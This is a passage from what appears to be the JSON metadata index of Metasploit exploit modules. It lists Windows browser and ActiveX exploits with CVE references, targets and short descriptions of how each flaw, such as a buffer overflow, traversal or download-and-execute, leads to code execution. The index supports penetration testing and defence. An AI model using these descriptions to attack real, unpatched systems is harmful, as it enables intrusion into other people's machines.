"URL-http://secunia.com/secunia_research/2012-2/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 7 on Windows Vista"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ntr_activex_stopmodule.rb",
"is_install_path": true,
"ref_name": "windows/browser/ntr_activex_stopmodule",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/oracle_autovue_setmarkupmode": {
"name": "Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow",
"full_name": "exploit/windows/browser/oracle_autovue_setmarkupmode",
"rank": 300,
"disclosure_date": "2012-04-18",
"type": "exploit",
"author": [
"Brian Gorenc",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the AutoVue.ocx ActiveX control.\n The vulnerability, due to the insecure usage of a strcpy-like function in the\n SetMarkupMode method when handling a specially crafted sMarkup argument, allows\n triggering a stack based buffer overflow which leads to code execution under the\n context of the user visiting a malicious web page.\n\n The module has been successfully tested against Oracle AutoVue Desktop Version\n 20.0.0 (AutoVue.ocx 20.0.0.7330) on IE 6, 7, 8 and 9 (Java 6 needed for DEP and\n ASLR bypass).",
"references": [
"CVE-2012-0549",
"BID-53077",
"OSVDB-81439",
"URL-http://dvlabs.tippingpoint.com/advisory/TPTI-12-05",
"URL-http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3 / Windows Vista SP2",
"IE 8 with Java 6 on Windows XP SP3/7 SP1/Vista SP2",
"IE 9 with Java 6 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb",
"is_install_path": true,
"ref_name": "windows/browser/oracle_autovue_setmarkupmode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/oracle_dc_submittoexpress": {
"name": "Oracle Document Capture 10g ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/oracle_dc_submittoexpress",
"rank": 300,
"disclosure_date": "2009-08-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).\n Oracle Document Capture 10g comes bundled with a third party ActiveX control\n emsmtp.dll (6.0.1.0). When passing an overly long string to the method \"SubmitToExpress\"\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-4607",
"OSVDB-38335",
"BID-25467",
"US-CERT-VU-281977"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb",
"is_install_path": true,
"ref_name": "windows/browser/oracle_dc_submittoexpress",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/oracle_webcenter_checkoutandopen": {
"name": "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/oracle_webcenter_checkoutandopen",
"rank": 600,
"disclosure_date": "2013-04-16",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the Oracle WebCenter Content\n CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where\n user controlled input is used to call ShellExecuteExW(). This module abuses the\n control to execute an arbitrary HTA from a remote location. This module has been\n tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle\n WebCenter Content 11.1.1.6.0.",
"references": [
"CVE-2013-1559",
"OSVDB-92386",
"BID-59122",
"URL-http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html",
"ZDI-13-094"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb",
"is_install_path": true,
"ref_name": "windows/browser/oracle_webcenter_checkoutandopen",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/orbit_connecting": {
"name": "Orbit Downloader Connecting Log Creation Buffer Overflow",
"full_name": "exploit/windows/browser/orbit_connecting",
"rank": 300,
"disclosure_date": "2009-02-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Orbit Downloader 2.8.4. When an\n attacker serves up a malicious web site, arbitrary code may be executed.\n The PAYLOAD windows/shell_bind_tcp works best.",
"references": [
"CVE-2009-0187",
"OSVDB-52294",
"BID-33894"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-SP2"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/orbit_connecting.rb",
"is_install_path": true,
"ref_name": "windows/browser/orbit_connecting",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ovftool_format_string": {
"name": "VMWare OVF Tools Format String Vulnerability",
"full_name": "exploit/windows/browser/ovftool_format_string",
"rank": 300,
"disclosure_date": "2012-11-08",
"type": "exploit",
"author": [
"Jeremy Brown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n malformed OVF file. The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.",
"references": [
"CVE-2012-3569",
"OSVDB-87117",
"BID-56468",
"URL-http://www.vmware.com/security/advisories/VMSA-2012-0015.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VMWare OVF Tools 2.1 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ovftool_format_string.rb",
"is_install_path": true,
"ref_name": "windows/browser/ovftool_format_string",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/pcvue_func": {
"name": "PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",
"full_name": "exploit/windows/browser/pcvue_func",
"rank": 200,
"disclosure_date": "2011-10-05",
"type": "exploit",
"author": [
"Luigi Auriemma",
"mr_me <steventhomasseeley@gmail.com>",
"TecR0c <roccogiovannicalvi@gmail.com >"
],
"description": "This module exploits a function pointer control within SVUIGrd.ocx of PcVue 10.0.\n By setting a dword value for the SaveObject() or LoadObject(), an attacker can\n overwrite a function pointer and execute arbitrary code.",
"references": [
"CVE-2011-4044",
"OSVDB-77561",
"BID-49795",
"URL-http://aluigi.altervista.org/adv/pcvue_1-adv.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Internet Explorer 6 / Internet Explorer 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/pcvue_func.rb",
"is_install_path": true,
"ref_name": "windows/browser/pcvue_func",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/persits_xupload_traversal": {
"name": "Persits XUpload ActiveX MakeHttpRequest Directory Traversal",
"full_name": "exploit/windows/browser/persits_xupload_traversal",
"rank": 600,
"disclosure_date": "2009-09-29",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a directory traversal in Persits Software Inc's\n XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5.\n By passing a string containing \"..\\\" sequences to the MakeHttpRequest method,\n an attacker is able to write arbitrary files to arbitrary locations on disk.\n\n Code execution occurs by writing to the All Users Startup Programs directory.\n You may want to combine this module with the use of exploit/multi/handler since a\n user would have to log in for the payload to execute.",
"references": [
"CVE-2009-3693",
"OSVDB-60001"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/persits_xupload_traversal.rb",
"is_install_path": true,
"ref_name": "windows/browser/persits_xupload_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/quickr_qp2_bof": {
"name": "IBM Lotus QuickR qp2 ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/quickr_qp2_bof",
"rank": 300,
"disclosure_date": "2012-05-23",
"type": "exploit",
"author": [
"Gaurav Baruah",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of _swscanf. The affected ActiveX is\n provided by the qp2.dll installed with the IBM Lotus Quickr product.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the qp2.dll 8.1.0.1800. In order to bypass ASLR, the non-ASLR-compatible module\n msvcr71.dll is used. This one is installed with the qp2 ActiveX.",
"references": [
"CVE-2012-2176",
"OSVDB-82166",
"BID-53678",
"ZDI-12-134",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21596191"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/quickr_qp2_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/quickr_qp2_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/real_arcade_installerdlg": {
"name": "Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution",
"full_name": "exploit/windows/browser/real_arcade_installerdlg",
"rank": 300,
"disclosure_date": "2011-04-03",
"type": "exploit",
"author": [
"rgod",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The \"exec\"\n function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands\n on the victim machine.",
"references": [
"OSVDB-71559",
"EDB-17105"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/real_arcade_installerdlg.rb",
"is_install_path": true,
"ref_name": "windows/browser/real_arcade_installerdlg",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/realplayer_cdda_uri": {
"name": "RealNetworks RealPlayer CDDA URI Initialization Vulnerability",
"full_name": "exploit/windows/browser/realplayer_cdda_uri",
"rank": 300,
"disclosure_date": "2010-11-15",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an initialization flaw within RealPlayer 11/11.1 and\n RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object\n initialization failure. However, this failure is improperly handled and\n uninitialized memory is executed.",
"references": [
"CVE-2010-3747",
"OSVDB-68673",
"BID-44144",
"ZDI-10-210",
"URL-http://service.real.com/realplayer/security/10152010_player/en/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"RealPlayer SP 1.0 - 1.1.4 Universal",
"RealPlayer 11.0 - 11.1 Universal"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/realplayer_cdda_uri.rb",
"is_install_path": true,
"ref_name": "windows/browser/realplayer_cdda_uri",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/realplayer_console": {
"name": "RealPlayer rmoc3260.dll ActiveX Control Heap Corruption",
"full_name": "exploit/windows/browser/realplayer_console",
"rank": 300,
"disclosure_date": "2008-03-08",
"type": "exploit",
"author": [
"Elazar Broad <elazarb@earthlink.net>"
],
"description": "This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control.\n By sending a specially crafted string to the 'Console' property\n in the rmoc3260.dll control, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2008-1309",
"OSVDB-42946",
"BID-28157",
"URL-http://secunia.com/advisories/29315/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 English"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/realplayer_console.rb",
"is_install_path": true,
"ref_name": "windows/browser/realplayer_console",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/realplayer_import": {
"name": "RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow",
"full_name": "exploit/windows/browser/realplayer_import",
"rank": 300,
"disclosure_date": "2007-10-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and\n RealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the \"Import()\"\n method, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-5601",
"OSVDB-41430",
"BID-26130"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE / RealOne Player 2 (6.0.11.853)",
"IE / RealPlayer 10.5 (6.0.12.1483)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/realplayer_import.rb",
"is_install_path": true,
"ref_name": "windows/browser/realplayer_import",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/realplayer_qcp": {
"name": "RealNetworks Realplayer QCP Parsing Heap Overflow",
"full_name": "exploit/windows/browser/realplayer_qcp",
"rank": 200,
"disclosure_date": "2011-08-16",
"type": "exploit",
"author": [
"Sean de Regge",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a heap overflow in Realplayer when handling a .QCP file.\n The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is\n allocated on the heap and user-supplied data from the file is copied within a\n memory copy loop.\n\n This allows a remote attacker to execute arbitrary code running in the context\n of the web browser via a .QCP file with a specially crafted \"fmt\" chunk.\n At this moment this module exploits the flaw on Windows XP IE6, IE7.",
"references": [
"CVE-2011-2950",
"OSVDB-74549",
"BID-49172",
"ZDI-11-265",
"URL-http://service.real.com/realplayer/security/08162011_player/en/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer 6 on XP SP3",
"Internet Explorer 7 on XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/realplayer_qcp.rb",
"is_install_path": true,
"ref_name": "windows/browser/realplayer_qcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/realplayer_smil": {
"name": "RealNetworks RealPlayer SMIL Buffer Overflow",
"full_name": "exploit/windows/browser/realplayer_smil",
"rank": 300,
"disclosure_date": "2005-03-01",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.\n By creating a URL link to a malicious SMIL file, a remote attacker could\n overflow a buffer and execute arbitrary code.\n When using this module, be sure to set the URIPATH with an extension of '.smil'.\n This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8\n build 6.0.9.584.",
"references": [
"CVE-2005-0455",
"OSVDB-14305",
"BID-12698"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"RealPlayer 10/8 on Windows 2000 SP0-SP4 English",
"RealPlayer 10/8 on Windows XP PRO SP0-SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/realplayer_smil.rb",
"is_install_path": true,
"ref_name": "windows/browser/realplayer_smil",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/roxio_cineplayer": {
"name": "Roxio CinePlayer ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/roxio_cineplayer",
"rank": 300,
"disclosure_date": "2007-04-11",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in SonicPlayer ActiveX\n control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.\n By setting an overly long value to 'DiskType', an attacker can overrun\n a buffer and execute arbitrary code.",
"references": [
"CVE-2007-1559",
"OSVDB-34779",
"BID-23412"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/roxio_cineplayer.rb",
"is_install_path": true,
"ref_name": "windows/browser/roxio_cineplayer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/safari_xslt_output": {
"name": "Apple Safari Webkit libxslt Arbitrary File Creation",
"full_name": "exploit/windows/browser/safari_xslt_output",
"rank": 600,
"disclosure_date": "2011-07-20",
"type": "exploit",
"author": [
"Nicolas Gregoire"
],
"description": "This module exploits a file creation vulnerability in the Webkit\n rendering engine. It is possible to redirect the output of an XSLT\n transformation to an arbitrary file. The content of the created file must be\n ASCII or UTF-8. The destination path can be relative or absolute. This module\n has been tested on Safari and Maxthon. Code execution can be achieved by first\n uploading the payload to the remote machine in VBS format, and then uploading a MOF\n file, which enables the Windows Management Instrumentation service to execute the VBS.",
"references": [
"CVE-2011-1774",
"OSVDB-74017",
"URL-http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/browser/safari_xslt_output.rb",
"is_install_path": true,
"ref_name": "windows/browser/safari_xslt_output",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/samsung_neti_wiewer_backuptoavi_bof": {
"name": "Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow",
"full_name": "exploit/windows/browser/samsung_neti_wiewer_backuptoavi_bof",
"rank": 300,
"disclosure_date": "2012-04-21",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the CNC_Ctrl.dll ActiveX control installed\n with the Samsung NET-i viewer 1.37.\n\n Specifically, when supplying a long string for the fname parameter to the\n BackupToAvi method, an integer overflow occurs, which leads to a subsequent buffer\n overflow due to the use of memcpy with an incorrect size, resulting in remote code\n execution under the context of the user.",
"references": [
"CVE-2012-4333",
"OSVDB-81453",
"BID-53193",
"URL-http://aluigi.altervista.org/adv/netiware_1-adv.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/samsung_neti_wiewer_backuptoavi_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/samsung_security_manager_put": {
"name": "Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution",
"full_name": "exploit/windows/browser/samsung_security_manager_put",
"rank": 600,
"disclosure_date": "2016-08-05",
"type": "exploit",
"author": [
"mr_me <mr_me@offensive-security.com>"
],
"description": "This is an exploit against Samsung Security Manager that bypasses the patch in ZDI-15-156 & ZDI-16-481\n by exploiting the vulnerability against the client-side. This exploit has been tested successfully using\n IE, FireFox and Chrome by abusing a GET request XSS to bypass CORS and reach the vulnerable PUT. Finally\n a traversal is used in the PUT request to upload the code just where we want it and gain RCE as SYSTEM.",
"references": [
"URL-http://www.zerodayinitiative.com/advisories/ZDI-15-156/",
"URL-http://www.zerodayinitiative.com/advisories/ZDI-16-481/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Samsung Security Manager 1.32 & 1.4 Universal"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/samsung_security_manager_put.rb",
"is_install_path": true,
"ref_name": "windows/browser/samsung_security_manager_put",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/sapgui_saveviewtosessionfile": {
"name": "SAP AG SAPgui EAI WebViewer3D Buffer Overflow",
"full_name": "exploit/windows/browser/sapgui_saveviewtosessionfile",
"rank": 300,
"disclosure_date": "2009-03-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Siemens Unigraphics Solutions\n Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled\n with SAPgui. When passing an overly long string to the SaveViewToSessionFile()\n method, arbitrary code may be executed.",
"references": [
"CVE-2007-4475",
"OSVDB-53066",
"US-CERT-VU-985449"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb",
"is_install_path": true,
"ref_name": "windows/browser/sapgui_saveviewtosessionfile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/siemens_solid_edge_selistctrlx": {
"name": "Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/siemens_solid_edge_selistctrlx",
"rank": 300,
"disclosure_date": "2013-05-26",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits the SEListCtrlX ActiveX installed with the Siemens Solid Edge product.\n The vulnerability exists on several APIs provided by the control, where user supplied input\n is handled as a memory pointer without proper validation, allowing an attacker to read and\n corrupt memory from the target process. This module abuses the methods NumChildren() and\n DeleteItem() in order to achieve memory info leak and remote code execution respectively.\n This module has been tested successfully on IE6-IE9 on Windows XP SP3 and Windows 7 SP1,\n using Solid Edge 10.4.",
"references": [
"OSVDB-93696",
"EDB-25712"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb",
"is_install_path": true,
"ref_name": "windows/browser/siemens_solid_edge_selistctrlx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/softartisans_getdrivename": {
"name": "SoftArtisans XFile FileManager ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/softartisans_getdrivename",
"rank": 300,
"disclosure_date": "2008-08-25",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SoftArtisans XFile FileManager ActiveX control\n (SAFmgPwd.dll 2.0.5.3). When sending an overly long string to the GetDriveName() method\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-1682",
"OSVDB-47794",
"US-CERT-VU-914785",
"BID-30826"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/softartisans_getdrivename.rb",
"is_install_path": true,
"ref_name": "windows/browser/softartisans_getdrivename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/sonicwall_addrouteentry": {
"name": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/sonicwall_addrouteentry",
"rank": 300,
"disclosure_date": "2007-11-01",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.\n By sending an overly long string to the \"AddRouteEntry()\" method located\n in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2007-5603",
"OSVDB-39069",
"URL-http://www.sec-consult.com/303.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE 6 / Windows XP SP2 Pro English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/sonicwall_addrouteentry.rb",
"is_install_path": true,
"ref_name": "windows/browser/sonicwall_addrouteentry",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/symantec_altirisdeployment_downloadandinstall": {
"name": "Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute",
"full_name": "exploit/windows/browser/symantec_altirisdeployment_downloadandinstall",
"rank": 600,
"disclosure_date": "2009-09-09",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows remote attackers to install and execute arbitrary files on a user's file system via\n AeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.",
"references": [
"BID-36346",
"CVE-2009-3028",
"OSVDB-57893"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb",
"is_install_path": true,
"ref_name": "windows/browser/symantec_altirisdeployment_downloadandinstall",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/symantec_altirisdeployment_runcmd": {
"name": "Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/symantec_altirisdeployment_runcmd",
"rank": 300,
"disclosure_date": "2009-11-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Symantec Altiris Deployment Solution.\n When sending an overly long string to RunCmd() method of\n AeXNSConsoleUtilities.dll (6.0.0.1426) an attacker may be able to execute arbitrary\n code.",
"references": [
"CVE-2009-3033",
"BID-37092",
"OSVDB-60496"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb",
"is_install_path": true,
"ref_name": "windows/browser/symantec_altirisdeployment_runcmd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/symantec_appstream_unsafe": {
"name": "Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute",
"full_name": "exploit/windows/browser/symantec_appstream_unsafe",
"rank": 600,
"disclosure_date": "2009-01-15",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability\n is in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the \"installAppMgr()\"\n method. The insecure method can be exploited to download and execute arbitrary files in the\n context of the currently logged-on user.",
"references": [
"CVE-2008-4388",
"OSVDB-51410"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/symantec_appstream_unsafe.rb",
"is_install_path": true,
"ref_name": "windows/browser/symantec_appstream_unsafe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/symantec_backupexec_pvcalendar": {
"name": "Symantec BackupExec Calendar Control Buffer Overflow",
"full_name": "exploit/windows/browser/symantec_backupexec_pvcalendar",
"rank": 300,
"disclosure_date": "2008-02-28",
"type": "exploit",
